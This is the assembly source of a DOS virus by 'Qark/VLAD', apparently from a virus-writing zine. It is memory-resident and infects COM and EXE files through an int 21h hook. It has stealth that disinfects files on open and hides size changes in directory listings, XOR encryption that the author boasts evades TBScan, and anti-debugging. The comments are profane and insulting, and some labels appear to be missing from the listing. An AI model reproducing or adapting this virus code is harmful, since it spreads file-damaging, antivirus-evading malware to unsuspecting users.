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synced 2025-02-23 15:04:39 +00:00
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831 lines
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; +-------+ Qark/VLAD
; This virus is named because I (and metabolis) support a republic for
; Australia. Fuck the Union Jack off from our flag... we want something
; Australian in there... and an Australian head of state not some pommy
; bitch Queen and her corgis.
; A funny thing: I wrote a full-on MTE/TPE/DAME type polymorphic engine
; for this virus, but TBScan found it every time! But when i do the
; shitty XOR routine that's at the end, TBScan hardly finds anything!
; TBAV can be proud of it's capabilites with polymorphism, but for
; basic encryption it's a big thumbs down...
; Stats:
; - Disinfect on open, Infect on close.
; - No directory filesize change
; - No findfirst filesize change
; - Some anti-debugging features
; Anyway, this is my best virus so far. I've come a fair way since broken,
; fucked up brother in VLAD#1 I'm sure you'll agree. I wrote this virus
; a few months ago and am better than this already.
; As always, the A86 assembler is my favourite :)
org 0
db 0beh ;MOV SI,xxxx
delta dw offset enc_start + 100h
call encrypt
push cs
pop ds ;DS=CS
sub si,offset enc_end ;The polymorphism is done.
mov word ptr [si+offset quit],20cdh
mov word ptr [si+offset quit],44c7h ;The bytes changed.
push es
push si
;If I don't get a feed soon, I'll start to fade...
mov ax,0FEEDh ;Feed ?
int 21h
cmp ax,0FADEh ;Yes...
je resident ;Fade...
mov ax,es
dec ax
mov ds,ax
cmp byte ptr [0],'Z'
jne resident
sub word ptr [3],160 ;2560 bytes of memory.
sub word ptr [12h],160 ;2560 bytes off TOM.
mov bx,word ptr [12h] ;Read in the TOM.
push cs
pop ds ;DS=CS
xor ax,ax ;ES=0 (Vector Table)
mov es,ax
mov ax,word ptr es:[132] ;Get int21h.
mov word ptr [si+offset i21],ax
mov ax,word ptr es:[134] ;Get int21h segment.
mov word ptr [si+offset i21+2],ax
mov es,bx ;ES=Segment to store virus.
xor di,di ;Zero in memory.
mov cx,offset length ;The size of the virus.
rep movsb ;Move the virus.
xor ax,ax
mov ds,ax ;ES=0 (Vector Table)
mov word ptr [132],offset infection
mov [134],bx ;BX=Virus Seg I hope!
pop si ;SI=IP (Virus start)
pop es ;ES=PSP
push cs
pop ds
cmp byte ptr [si+offset com_exe],1
je exe_exit
mov ax,word ptr [si+offset old3]
mov [100h],ax
mov al,byte ptr [si+offset old3+2]
mov [102h],al
push es
pop ds
call zero_all
mov ax,100h
jmp ax
mov ax,es ;ES=PSP
add ax,10h ;EXE file start.
add word ptr [si+jump+2],ax
call zero_all
mov sp,word ptr [si+offset orig_sp]
add ax,word ptr [si+offset orig_ss] ;Fix SS with AX.
mov ss,ax
push es
pop ds
db 0eah
jump dd 0
Message db 'Go the Republic! '
db 'Fuck off Royal Family!',0
Creator db 'Qark/VLAD of the Republic of Australia',0
push ax
xchg al,ah
cmp ax,004bh ;Exec. Don't infect on 4B01h because
je test_inf ;debug will find it then.
cmp al,43h ;Chmod.
je test_inf
cmp al,56h ;Rename.
je test_inf
cmp al,6ch ;Open.
je dis_inf
cmp al,3dh ;Open
je dis_inf
cmp al,11h ;FCB find.
je dir_listing
cmp al,12h ;Dir listing in progress.
je dir_listing
cmp al,4eh ;Find first.
je find_file
cmp al,4fh ;Find_next.
je find_file
cmp al,3eh ;Close.
je end_infect
pop ax
cmp ax,0FEEDh
je res_check ;Testing for installation ?
jmp jend ;Exit TSR
mov ax,0FADEh ;Return parameter.
jmp dir_stealth
jmp search_stealth
jmp full_stealth ;Disinfect on the fly.
jmp close_infect
jmp far_pop_exit ;Just an exit.
push bx
push cx
push dx
push si
push di
push ds
push es
call check_name
jc jump2_exit
mov ax,3d00h ;Open readonly.
mov dx,di ;DX=DI=Offset length
call int21h
jc jump2_exit
mov bx,ax
call get_sft
;Test for infection.
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
je jump2_exit
push cs
pop es ;ES=CS
;Read the File header in to test
;for EXE or COM.
mov ah,3fh ;Read from file.
mov cx,1ch ;1C bytes.
call int21h ;DX=Offset length from file open.
;We don't need the filename anymore
;so use that space as a buffer.
mov si,dx ;SI=DX=offset length.
mov di,offset header
mov cx,18h
rep movsb ;Move header to header.
mov si,dx ;SI=DX=Offset of length.
mov ax,word ptr [si] ;=Start of COM or EXE.
add al,ah ;Add possible MZ.
cmp al,167 ;Test for MZ.
je exe_infect
jmp com_infect
mov byte ptr com_exe,1 ;Signal EXE file.
cmp word ptr [si+1ah],0 ;Test for overlays.
jne exe_close_exit ;Quick... run!!!
push si ;SI=Offset of header
add si,0eh ;SS:SP are here.
mov di,offset orig_ss
movsw ;Move them!
mov di,offset jump ;The CS:IP go in here.
lodsw ;ADD SI,2 - AX destroyed.
movsw ;Move them!
pop si
call get_sft ;ES:DI = SFT for file.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
mov cx,16 ;Divide by paragraphs.
div cx
sub ax,word ptr [si+8] ;Subtract headersize.
mov word ptr delta,dx ;Initial IP.
add delta,offset enc_start ;Fix for polymorphics.
mov word ptr [si+14h],dx ;IP in header.
mov word ptr [si+16h],ax ;CS in header.
add dx,offset stack_end ;Fix SS:SP for file.
mov word ptr [si+0eh],ax ;We'll make SS=CS
mov word ptr [si+10h],dx ;SP=IP+Offset of our buffer.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
add ax,offset length ;Add the virus length on.
adc dx,0 ;32bit
mov cx,512 ;Divide by pages.
div cx
and dx,dx
jz no_page_fix
inc ax ;One more for the partial
mov word ptr [si+4],ax ;Number of pages.
mov word ptr [si+2],dx ;Partial page.
mov word ptr es:[di+15h],0 ;Lseek to start of file.
call get_date ;Save the old time/date.
mov ah,40h ;Write header to file.
mov dx,si ;Our header buffer.
mov cx,1ch ;1CH bytes.
call int21h
jc exe_close_exit
mov ax,4202h ;End of file. Smaller than
;using SFT's.
xor cx,cx ;Zero CX
cwd ;Zero DX (If AX < 8000H then
;CWD moves zero into DX)
call int21h
call enc_setup ;Thisll encrypt it and move
;it to the end of file.
jmp com_close_exit
mov byte ptr com_exe,0 ;Flag COM infection.
mov ax,word ptr [si] ;Save COM files first 3 bytes.
mov word ptr old3,ax
mov al,[si+2]
mov byte ptr old3+2,al
call get_sft ;SFT is at ES:DI
mov ax,es:[di+11h] ;AX=File Size
cmp ax,64000
ja com_close_exit ;Too big.
cmp ax,1000
jb com_close_exit ;Too small.
push ax ;Save filesize.
mov newoff,ax ;For the new jump.
sub newoff,3 ;Fix the jump.
mov word ptr es:[di+15h],0 ;Lseek to start of file :)
call get_date ;Save original file date.
mov ah,40h
mov cx,3
mov dx,offset new3 ;Write the virus jump to start of
call int21h ;file.
pop ax ;Restore file size.
jc com_close_exit ;If an error occurred... exit.
mov word ptr es:[di+15h],ax ;Lseek to end of file.
add ax,offset enc_start + 100h ;File size + 100h.
mov word ptr delta,ax ;The delta offset for COM files.
call enc_setup
mov ah,3eh
call int21h
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 0eah ;Opcode for jmpf
i21 dd 0
int21h proc near ;Our int 21h
call dword ptr cs:[i21]
int21h endp
cmp bl,4
ja good_handle
pop ax
jmp jend
push bx ;Save the original registers.
push cx
push dx
push si
push di
push ds
push es
call get_sft ;ES:DI = SFT
mov ax,word ptr es:[di+0dh] ;AX=Time
and ax,1f1fh ;Shit we don't need.
cmp al,ah ;AL=AH means infected.
je far_pop_exit
mov dx,offset length
push cs
pop ds
mov word ptr es:[di+2],2 ;Read/Write mode.
mov word ptr es:[di+15h],0 ;Zero file pointer.
mov word ptr es:[di+17h],0 ;Zero file pointer.
add di,28h ;ES:DI=Extension
cmp word ptr es:[di],'OC'
je close_com
cmp word ptr es:[di],'XE'
jne far_pop_exit
inc di
inc di
cmp byte ptr es:[di],'E'
jne far_pop_exit
jmp handle_infection
cmp byte ptr es:[di+2],'M'
jne far_pop_exit
jmp handle_infection
push bx
push cx
push dx
push si
push di
push ds
push es
cmp al,6ch
jne stealth_6c
mov dx,si
call check_name
jnc do_stealth
jmp far_pop_exit
mov ax,3d00h
mov dx,di
call int21h
jc stealth_end
mov bx,ax ;BX=filehandle
call get_sft
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
jne stealth_end ;Not infected...
mov ax,word ptr es:[di+11h] ;File size.
mov dx,word ptr es:[di+13h]
push dx
push ax
sub ax,1ch ;Header+time+date = 1ch
sbb dx,0
mov word ptr es:[di+15h],ax ;File pointer.
mov word ptr es:[di+17h],dx
mov ah,3fh
mov dx,offset header ;Read in header.
mov cx,1ch
call int21h
pop ax
pop dx ;DX:AX=length of file
sub ax,offset length ;EOF - length.
sbb dx,0
mov word ptr es:[di+15h],ax
mov word ptr es:[di+17h],dx
mov ah,40h ;Truncate virus off.
xor cx,cx
call int21h
jc stealth_end
mov word ptr es:[di+15h],0 ;Start of file
mov word ptr es:[di+17h],0
mov ah,40h
mov dx,offset header
mov cx,18h
call int21h ;Write original header back.
mov cx,word ptr time
mov dx,word ptr date
mov ax,5701h ;Put original time/date back.
call int21h
mov ah,3eh ;Close file.
call int21h
jmp stealth_end
Check_Name proc near
;Carry if bad name.
;AX is fucked.
;SI = File Extension Somewhere.
;DI = Offset length.
mov si,dx ;DS:SI = Filename.
push cs
pop es ;ES=CS
mov ah,60h ;Get qualified filename.
mov di,offset length ;DI=Buffer for filename.
call int21h ;This converts it to uppercase too!
;CS:LENGTH = Filename in uppercase
;with path and drive. Much easier
;to handle now!
push cs
pop ds ;DS=CS
mov si,di ;SI=DI=Offset Length
cld ;Forward!
cmp al,0
jne find_ascii_z
sub si,4 ;Points to the file extension. 'EXE'
lodsw ;Mov AX,DS:[SI]
cmp ax,'XE' ;The 'EX' out of 'EXE'
jne test_com
lodsb ;Mov AL,DS:[SI]
cmp al,'E' ;The last 'E' in 'EXE'
jne Bad_Name
jmp do_file ;EXE-file
cmp ax,'OC' ;The 'CO' out of 'COM'
jne Bad_Name
lodsb ;Mov AL,DS:[SI]
cmp al,'M'
je do_file ;COM-file
Check_Name endp
pop ax ;Restore AX.
call int21h
jc end_search
push es
push bx
push si
mov ah,2fh
call int21h
mov si,bx
mov bx,word ptr es:[si+16h]
and bx,1f1fh
cmp bl,bh
jne search_pop ;Is our marker set ?
sub word ptr es:[si+1ah],offset length ;Subtract the file length.
sbb word ptr es:[si+1ch],0
pop si
pop bx
pop es
retf 2 ;This is the same as an IRET
;except that the flags aren't popped
;off so our Carry Remains set.
;This bit means that wen you do a 'dir' there is no change in
;file size.
pop ax
call int21h ;Call the interrupt
cmp al,0 ;straight off.
jne end_of_dir
push es
push ax ;Save em.
push bx
push si
mov ah,2fh ;Get DTA address.
call int21h
mov si,bx
cmp byte ptr es:[si],0ffh ;Extended FCB ?
jne not_extended
add si,7 ;Add the extra's.
mov bx,word ptr es:[si+17h] ;Move time.
and bx,1f1fh
cmp bl,bh
jne dir_pop ;Is our marker set ?
sub word ptr es:[si+1dh],offset length ;Subtract the file length.
sbb word ptr es:[si+1fh],0
pop si
pop bx
pop ax
pop es
Get_Date proc near
mov ax,5700h ;Get Date/Time.
call int21h
mov word ptr time,cx
mov word ptr date,dx
Get_date endp
Set_Marker proc near
mov cx,time
mov al,ch
and al,1fh
and cl,0e0h
or cl,al
mov dx,date
mov ax,5701h
call int21h
Set_marker endp
Enc_Setup proc near
push cs
pop es
in al,40h
mov byte ptr cs:cipher,al
xor si,si
mov di,offset length ;Offset of our buffer.
mov cx,offset length ;Virus Length.
rep movsb ;Move the virus up in memory for
mov si,offset length + offset enc_start
call encrypt ;Encrypt virus.
mov ah,40h ;Write virus to file
mov dx,offset length ;Buffer for encrypted virus.
mov cx,offset length ;Virus length.
call int21h
call set_marker ;Mark file as infected.
Enc_setup endp
Get_SFT Proc Near
;Entry: BX=File Handle.
;Exit: ES:DI=SFT.
push bx
mov ax,1220h ;Get Job File Table Entry. The byte pointed
int 2fh ;at by ES:[DI] contains the number of the
;SFT for the file handle.
xor bx,bx
mov bl,es:[di] ;Get address of System File Table Entry.
mov ax,1216h
int 2fh
pop bx
Get_SFT EndP
Zero_All proc near
;Zero's everything cept AX.
xor bx,bx ;Zero BX
mov cx,bx
mov dx,bx
mov di,bx
Zero_All endp
New3 db 0e9h ;The jump for the start of
Newoff dw 0 ;COM files.
orig_ss dw 0
orig_sp dw 0
com_exe db 0
old3 db 0cdh,20h,90h
enc_end: ;Encryption ends here.
; QaRK's |<-RaD TBSCaN eVaDeR!!!!!111
; Works every time :)
encrypt proc near
;Si = enc_start
mov cx,offset enc_end - offset enc_start
db 0b0h ;=MOV AL,xx
cipher db 0
ror al,1
neg al
xor cs:[si],al ;<--- Whoah! Never guess this was encryption!
add al,al
inc si
loop enc_loop
Encrypt endp
header db 18h dup (0) ;rewrite this
time dw 0 ;restore this
date dw 0
length db 200 dup (0)